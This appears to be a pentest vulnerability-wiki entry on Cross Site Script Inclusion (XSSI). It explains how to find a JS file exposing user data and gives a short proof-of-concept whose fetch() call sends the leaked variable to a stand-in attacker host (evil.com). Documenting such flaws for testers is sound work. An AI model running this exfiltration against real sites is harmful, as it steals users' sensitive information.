Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

Cross Site Script Inclusion (XSSI)

POC

Try to find a JS file which includes sensitive information of the user Look at the HTTP GET request for the JS file to make sure that it doesn’t require CORS triggering headers like: Authorization, X-API-KEY, X-CSRF-TOKEN, X-whatever If it does have CORS headers then, the attack will fail, unless you find a CORS issue. Use the following PoC to exploit // var<em>name is a variable in vuln.js holding sensitive information console.log(var</em>name); // sending information to an attacker controlled server fetch(&quot;https://evil.com/stealInfo?info=&quot;+var_name);

Impact

Medium-High

Likelihood

Medium-High